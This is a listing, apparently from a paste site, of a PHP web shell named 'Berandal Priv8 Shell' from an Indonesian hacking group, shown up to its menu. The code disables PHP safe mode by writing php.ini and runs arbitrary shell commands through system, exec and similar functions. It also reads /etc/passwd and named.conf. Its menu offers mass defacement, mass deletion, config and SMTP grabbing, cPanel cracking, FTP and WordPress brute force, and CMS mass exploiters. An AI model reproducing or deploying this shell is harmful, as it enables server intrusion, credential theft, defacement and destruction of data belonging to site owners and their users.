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) format('woff');
  171.     font-weight: normal;
  172.     font-style: normal;
  173. }html {
  174.     background-color: black;
  175.     background-attachment: fixed;
  176.     background-repeat: no-repeat;
  177.     background-position: center;
  178.     background-size: 1280px;
  179.     color: white;
  180.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  181.     font-size: 13px;
  182.     width: 100%;
  183. }
  184. .phpinfo table{width:100%;padding:0 0 0 0;}
  185. .phpinfo td{background:black;color:#cccccc;padding:6px 8px;;}
  186. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  187. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  188. li {
  189.     display: inline;
  190.     margin: 5px;
  191.     padding: 5px;
  192.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  193.     color: white
  194. }
  195. .kedip {
  196. -webkit-animation-name: blinker;
  197. -webkit-animation-duration: 3s;
  198. -webkit-animation-timing-function: linear;
  199. -webkit-animation-iteration-count: infinite;
  200. -moz-animation-name: blinker;
  201. -moz-animation-duration: 2s;
  202. -moz-animation-timing-function: linear;
  203. -moz-animation-iteration-count: infinite;
  204.  animation-name: blinker;
  205.  animation-duration: 1s;
  206.  animation-timing-function: linear;
  207.  animation-iteration-count: infinite;
  208.  color: white;
  209. }
  210. @-moz-keyframes blinker {  
  211.  0% { opacity: 1.0; }
  212.  50% { opacity: 0.0; }
  213.  100% { opacity: 1.0; }
  214.  }
  215. @-webkit-keyframes blinker {  
  216.  0% { opacity: 1.0; }
  217.  50% { opacity: 0.0; }
  218.  100% { opacity: 1.0; }
  219.  }
  220. @keyframes blinker {  
  221.  0% { opacity: 1.0; }
  222.  50% { opacity: 0.0; }
  223.  100% { opacity: 1.0; }
  224.  }
  225. table, th, td {
  226.     font-family:ubuntu_monoregular;
  227.     background: black;
  228.     font-size: 13px;
  229. }
  230. .th_home {
  231.     font-family:ubuntu_monoregular;
  232.      font-size: 12px;
  233.      background:#292929;
  234.      color:white;
  235.      border-color: #292929;
  236.      text-decoration:none;
  237.      letter-spacing:2px;
  238. }
  239. .table_home, .td_home {
  240.     border: 1px solid #191919;
  241. }
  242. .table_home td:hover {
  243.     background: #292929;
  244. }
  245. th {
  246.     padding: 10px;
  247.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  248. }
  249. a {
  250.     color: white;
  251.     text-decoration: none;
  252. }
  253. a:hover {
  254.     text-decoration: underline;
  255. }
  256. .kotak {
  257.     background: #292929;
  258.     margin:0 4px;border:1px;
  259. }
  260. .kotak:hover{
  261.     background: #363636;
  262. }
  263. .asu a{
  264.     color: red;
  265. }
  266. .asu a:hover {
  267.     color: white;
  268.     text-decoration: none;
  269. }
  270. #menu a {
  271.      font-family:ubuntu_monoregular;
  272.      font-size: 12px;
  273.      background:#191919;
  274.      color:white;
  275.      margin:5px 2px 4px 2px;
  276.      padding:5px 8px;
  277.      border-color: white;
  278.      text-decoration:none;
  279.      letter-spacing:2px;
  280.      -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  281.        }
  282. #menu a:hover {
  283.      font-size: 12px;
  284.      background:#292929;-webkit-transform:rotate(0.0deg);-moz-transform:rotate(0.0deg);-ms-transform:rotate(0.0deg);-o-transform:rotate(0.0deg);transform:rotate(0.0deg);
  285.      color: white;
  286.      padding:5px 8px;
  287.      margin:1px;
  288.      font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  289.      letter-spacing:2px;
  290.      margin:5px 2px 4px 2px;
  291.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  292.        }
  293. b {
  294.     color: red;
  295. }
  296. fieldset{
  297.     background: black;
  298.     color: #ffffff;
  299.     margin:0 4px;
  300.     border: 1px solid white;
  301.     padding-left: 5px;
  302.     font-family:ubuntu_monoregular;border:1;
  303.     font-size: 13px;
  304. }
  305. input[type=text], input[type=password],input[type=submit] {
  306.     background: black;
  307.     color: #ffffff;
  308.     margin:0 4px;
  309.     border: 1px solid white;
  310.     padding-left: 5px;
  311.     font-family:ubuntu_monoregular;border:1;
  312.     font-size: 13px;
  313. }
  314. .kmail{
  315.     background:black;
  316.     border:0;
  317.     padding:2px;
  318.     border-bottom:1px solid #222222;
  319.     border-top:1px solid #222222;
  320. }
  321. textarea {
  322.        width:1200px;
  323.        height:350px;
  324.        background: black;
  325.        border:1px solid white;
  326.        color: white;
  327.        font-size: 10pt;
  328.        font-family: ubuntu_monoregular;
  329. }
  330. select {
  331.     width: 152px;
  332.     background: black;
  333.     color: white;
  334.     border: 1px solid #ffffff;
  335.     margin: 5px auto;
  336.     padding-left: 5px;
  337.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  338.     font-size: 13px;
  339. }
  340. option{
  341.     background: #292929;
  342.     border: 1px solid white;
  343. }
  344. option:hover {
  345.     background: #363636;
  346.     color: #000000;
  347. }
  348. .mybox  {
  349.     -moz-border-radius:10px;
  350.     border-radius:10px;
  351.     border:1px solid white;
  352.     margin:4px 0 8px;
  353.     padding:14px 8px;
  354. }
  355. .muter {
  356. onmousedown:stop;
  357. animation-name: rotate ;
  358. animation-duration: 5s;
  359. animation-play-state: running;
  360. animation-timing-function: linear;
  361. animation-iteration-count: infinite;
  362. opacity: 1.0;filter: alpha(opacity=50);} img:hover {opacity: 1.0;filter: alpha(opacity=100);}
  363.  
  364. @keyframes rotate{
  365. 10% {transform:rotateY(36deg)}
  366. 20% {transform:rotateY(72deg)}
  367. 30% {transform:rotateY(108deg)}
  368. 40% {transform:rotateY(144deg)}
  369. 50% {transform:rotateY(180deg)}
  370. 60% {transform:rotateY(216deg)}
  371. 70% {transform:rotateY(252deg)}
  372. 80% {transform:rotateY(288deg)}
  373. 90% {transform:rotateY(324deg)}
  374. 100% {transform:rotateY(360deg)}
  375. }
  376. </style>
  377. </head>
  378. <center>
  379. <?php
  380. //Jangan Diganti Coegg 1 Huruf aja yang salah semua eror :P//
  381. /*
  382. +----------------Berandal Priv8 Shell-----------------+
  383. +-----------------------------------------------------+
  384. +-------------------Find us on:-----------------------+
  385. | Facebook      : fb.com/owsquad.id
  386. | Group         : fb.com/groups/owlsquadtoday
  387. | Coder         : twitter.com/id_berandal
  388. +-----------------------------------------------------+
  389. */
  390. if (file_exists("php.ini")){
  391. }else{
  392. $img = fopen('php.ini', 'w');
  393. $sec = "safe_mode = OFF
  394. disable_funtions = NONE";
  395. fwrite($img ,$sec);
  396. fclose($img);}      
  397. function w($dir,$perm) {
  398.     if(!is_writable($dir)) {
  399.         return "<font color=red>".$perm."</font>";
  400.     } else {
  401.         return "<font color=lime>".$perm."</font>";
  402.     }
  403. }
  404. function exe($cmd) {    
  405. if(function_exists('system')) {        
  406.         @ob_start();        
  407.         @system($cmd);      
  408.         $buff = @ob_get_contents();        
  409.         @ob_end_clean();        
  410.         return $buff;  
  411.     } elseif(function_exists('exec')) {        
  412.         @exec($cmd,$results);      
  413.         $buff = "";        
  414.         foreach($results as $result) {          
  415.             $buff .= $result;      
  416.         } return $buff;    
  417.     } elseif(function_exists('passthru')) {        
  418.         @ob_start();        
  419.         @passthru($cmd);        
  420.         $buff = @ob_get_contents();        
  421.         @ob_end_clean();        
  422.         return $buff;  
  423.     } elseif(function_exists('shell_exec')) {      
  424.         $buff = @shell_exec($cmd);      
  425.         return $buff;  
  426.     }
  427. }
  428. function perms($file){
  429. $perms = fileperms($file);
  430. if (($perms & 0xC000) == 0xC000) {
  431. $info = 's';
  432. } elseif (($perms & 0xA000) == 0xA000) {
  433. $info = 'l';
  434. } elseif (($perms & 0x8000) == 0x8000) {
  435. $info = '-';
  436. } elseif (($perms & 0x6000) == 0x6000) {
  437. $info = 'b';
  438. } elseif (($perms & 0x4000) == 0x4000) {
  439. $info = 'd';
  440. } elseif (($perms & 0x2000) == 0x2000) {
  441. $info = 'c';
  442. } elseif (($perms & 0x1000) == 0x1000) {
  443. $info = 'p';
  444. } else {
  445. $info = 'u';
  446. }
  447. $info .= (($perms & 0x0100) ? 'r' : '-');
  448. $info .= (($perms & 0x0080) ? 'w' : '-');
  449. $info .= (($perms & 0x0040) ?
  450. (($perms & 0x0800) ? 's' : 'x' ) :
  451. (($perms & 0x0800) ? 'S' : '-'));
  452. $info .= (($perms & 0x0020) ? 'r' : '-');
  453. $info .= (($perms & 0x0010) ? 'w' : '-');
  454. $info .= (($perms & 0x0008) ?
  455. (($perms & 0x0400) ? 's' : 'x' ) :
  456. (($perms & 0x0400) ? 'S' : '-'));
  457. $info .= (($perms & 0x0004) ? 'r' : '-');
  458. $info .= (($perms & 0x0002) ? 'w' : '-');
  459. $info .= (($perms & 0x0001) ?
  460. (($perms & 0x0200) ? 't' : 'x' ) :
  461. (($perms & 0x0200) ? 'T' : '-'));
  462. return $info;
  463. }
  464. function hdd($s) {
  465. if($s >= 1073741824)
  466. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  467. elseif($s >= 1048576)
  468. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  469. elseif($s >= 1024)
  470. return sprintf('%1.2f',$s / 1024 ) .' KB';
  471. else
  472. return $s .' B';
  473. }
  474. function ambilKata($param, $kata1, $kata2){
  475.     if(strpos($param, $kata1) === FALSE) return FALSE;
  476.     if(strpos($param, $kata2) === FALSE) return FALSE;
  477.     $start = strpos($param, $kata1) + strlen($kata1);
  478.     $end = strpos($param, $kata2, $start);
  479.     $return = substr($param, $start, $end - $start);
  480.     return $return;
  481. }
  482. if(get_magic_quotes_gpc()) {
  483.     function berandal_ss($array) {
  484.         return is_array($array) ? array_map('berandal_ss', $array) : stripslashes($array);
  485.     }
  486.     $_POST = berandal_ss($_POST);
  487. }
  488.  
  489. if(isset($_GET['dir'])) {
  490.     $dir = $_GET['dir'];
  491.     chdir($_GET['dir']);
  492. } else {
  493.     $dir = getcwd();
  494. }
  495. $dir = str_replace("\\","/",$dir);
  496. $freespace = hdd(disk_free_space("/"));
  497. $total = hdd(disk_total_space("/"));
  498. $used = $total - $freespace;
  499. $scdir = explode("/", $dir);
  500. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<th><font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  501. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  502. $ds = @ini_get("disable_functions");
  503. $pg_on = (function_exists('pg_connect')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  504. $ora_on = (function_exists('ocilogon')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  505. $mssql_on = (function_exists('mssql_connect')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  506. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  507. $curl = (function_exists('curl_version')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  508. $wget = (exe('wget --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  509. $perl = (exe('perl --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  510. $python = (exe('python --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  511. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>GAK ADA</font></th>";
  512.  
  513. if(!function_exists('posix_getegid')) {
  514.     $user = @get_current_user();
  515.     $uid = @getmyuid();
  516.     $gid = @getmygid();
  517.     $group = "?";
  518. } else {
  519.     $uid = @posix_getpwuid(posix_geteuid());
  520.     $gid = @posix_getgrgid(posix_getegid());
  521.     $user = $uid['name'];
  522.     $uid = $uid['uid'];
  523.     $group = $gid['name'];
  524.     $gid = $gid['gid'];
  525. }
  526. $admin_id=$_SERVER['SERVER_ADMIN'];
  527. $software = getenv("SERVER_SOFTWARE");
  528. $d0mains = @file("/etc/named.conf");
  529.             $users=@file('/etc/passwd');
  530.         if($d0mains)
  531.         {
  532.             $count;  
  533.             foreach($d0mains as $d0main)
  534.             {
  535.                 if(@ereg("zone",$d0main))
  536.                 {
  537.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  538.                     flush();
  539.                     if(strlen(trim($domains[1][0])) > 2)
  540.                     {
  541.                         flush();
  542.                         $count++;
  543.                     }
  544.                 }
  545.             }
  546.         }
  547.  
  548. $sport=$_SERVER['SERVER_PORT'];
  549. echo "<a target='blank' href='https://www.twitter.com/id_berandal/'><img class='muter' src='http://orig11.deviantart.net/0274/f/2017/100/3/2/upload_by_owlsquad-db5e7bb.jpg' width='230' height='340' align='left'></a>";
  550. echo "<br><table style='padding-left=1px' align='left'>";
  551. echo "<td onkeydown='return false' onmousedown='return false'></td>";
  552. echo "<h1 style='text-decoration:underline;text-align:left; font-size:20pt'>Berandal Priv8 Shell</h1><br>";
  553. echo "<tr><td>System: ".php_uname()."</td></tr>";
  554. echo "<tr><td>PHP Version : ".phpversion()." <font color='white'> on</font> ".php_sapi_name()." <font class='asu'>[<a href='?dir=$dir&666=phinfo'>PHP Info</a>]</font></td></tr>";
  555. echo "<tr><td>User: ".$user." (".$uid.") Group: ".$group." (".$gid.")</td></tr><td>Admin : ".$admin_id." | Websites: $count  Domains</td>";
  556. echo "<tr><td>Server IP: ".gethostbyname($_SERVER['HTTP_HOST'])." | Your IP: ".$_SERVER['REMOTE_ADDR']." ";
  557. echo "<tr><td>Port :  $sport </td></tr>";
  558. echo "<tr><td>HDD: $used / $total ( Sisa: $freespace )</td></tr>";
  559. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  560. echo "<tr><td>Safe Mode: $sm</td></tr>";
  561. echo "<tr><td>MySQL: $mysql | MSSQL: $mssql_on | cURL: $curl | Perl: $perl | Python: $python | WGet: $wget | PostgreSQL: $pg_on | Oracle: $ora_on</td></tr>";
  562. echo "<tr><td>Dir : ";
  563. foreach($scdir as $c_dir => $cdir) {  
  564.     echo "<a href='?dir=";
  565.     for($i = 0; $i <= $c_dir; $i++) {
  566.         echo $scdir[$i];
  567.         if($i != $c_dir) {
  568.         echo "/";
  569.         }
  570.     }
  571.     echo "'>$cdir</a>/";
  572. }
  573. echo "</td></tr></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><hr color='white'>";
  574. echo "<p><center><div id=menu border='1' >";
  575. echo "<ul>";
  576. echo "<a href='?'>Home</a>";
  577. echo "<a href='?dir=$dir&666=upload'>Upload</a>";
  578. echo "<a href='?dir=$dir&666=cmd'>Command</a>";
  579. echo "<a href='?dir=$dir&666=mass_deface'>Mass Deface</a>";
  580. echo "<a href='?dir=$dir&666=mass_delete'>Mass Delete</a>";
  581. echo "<a href='?dir=$dir&666=config'>GrabConfig</a>";
  582. echo "<a href='?dir=$dir&666=auto_edit_user'>Auto EditUser</a>";
  583. echo "<a href='?dir=$dir&666=lompat_indah'>LompatIndah</a>";
  584. echo "<a href='?dir=$dir&666=symlink'>Symlink</a><br><br>";
  585. echo "<a href='?dir=$dir&666=csrf'>CSRF</a>";
  586. echo "<a href='?dir=$dir&666=adfin'>AdminFinder</a>";
  587. echo "<a href='?dir=$dir&666=brute'>FTP BruteForce</a>";
  588. echo "<a href='?dir=$dir&666=cpdepes'>CPanel Auto Deface</a>";
  589. echo "<a href='?dir=$dir&666=cpanel'>CPanel Crack</a>";
  590. echo "<a href='?dir=$dir&666=smtp'>SMTP Grabber</a>";
  591. echo "<a href='?dir=$dir&666=loghunter'>LogHunter</a><br><br>";
  592. echo "<a href='?dir=$dir&666=auto_dwp'>WordPressAutoDeface</a>";
  593. echo "<a href='?dir=$dir&666=auto_dwp2'>WordPressAutoDeface V2</a>";
  594. echo "<a href='?dir=$dir&666=auto_wp'>WordPressAutoEditTitle</a>";
  595. echo "<a href='?dir=$dir&666=wpbrute'>WordPressBruteForce</a><br><br>";
  596. echo "<a href='?dir=$dir&666=adminer'>Adminer</a>";
  597. echo "<a href='?dir=$dir&666=zoneh'>Zone-H</a>";
  598. echo "<a href='?dir=$dir&666=elfinder'>elFinderMass</a>";
  599. echo "<a href='?dir=$dir&666=network'>Network</a>";
  600. echo "<a href='?dir=$dir&666=sec'>SafeMode</a>";
  601. echo "<a href='?dir=$dir&666=fake_root'>FakeRoot</a>";
  602. echo "<a href='?dir=$dir&666=port'>PortScan</a>";
  603. echo "<a href='?dir=$dir&666=mal'>MalwareTools</a><br><br>";
  604. echo "<a href='?dir=$dir&666=magento'>Magento Exploiter</a>";
  605. echo "<a href='?dir=$dir&666=lokmed'>Lokomedia Exploiter</a>";
  606. echo "<a href='?dir=$dir&666=balitbang'>Balitbang Exploiter</a>";
  607. echo "<a href='?dir=$dir&666=passwbypass'>Bypass etc/passw</a><br><br>";
  608. echo "<a href='?dir=$dir&666=revslider'>Revslider MassExploiter</a>";
  609. echo "<a href='?dir=$dir&666=drupal'>Drupal MassExploiter</a>";
  610. echo "<a href='?dir=$dir&666=cmsvuln'>CMS Vulnerability Scanner</a><br><br>";
  611. echo "<a href='?dir=$dir&666=string'>StringTools</a>";
  612. echo "<a href='?dir=$dir&666=hashid'>Hash Identifier</a>";
  613. echo "<a href='?dir=$dir&666=64base'>Base64 Tools</a>";
  614. echo "<a href='?dir=$dir&666=zip'>Zip Menu</a>";
  615. echo "<a href='?dir=$dir&666=krdp'>K-RDP Shell</a><br><br>";
  616. echo "<a href='?dir=$dir&666=cgi'>CGI Shell</a>";
  617. echo "<a href='?dir=$dir&666=phinfo'>PHP Info</a>";
  618. echo "<a href='?dir=$dir&666=infosec'>Server Info</a>";
  619. echo "<a href='http://pastebin.com/u/berandal666' target='blank'>Update</a>";
  620. echo "<a href='?dir=$dir&666=about'>About</a>";
  621. echo "<a href='?dir=$dir&666=metu'>Minggaaaat</a><br>";
  622. echo "</ul>";
  623. echo "</div>";
  624. echo "</center>";
  625. echo "<hr color='white'>";
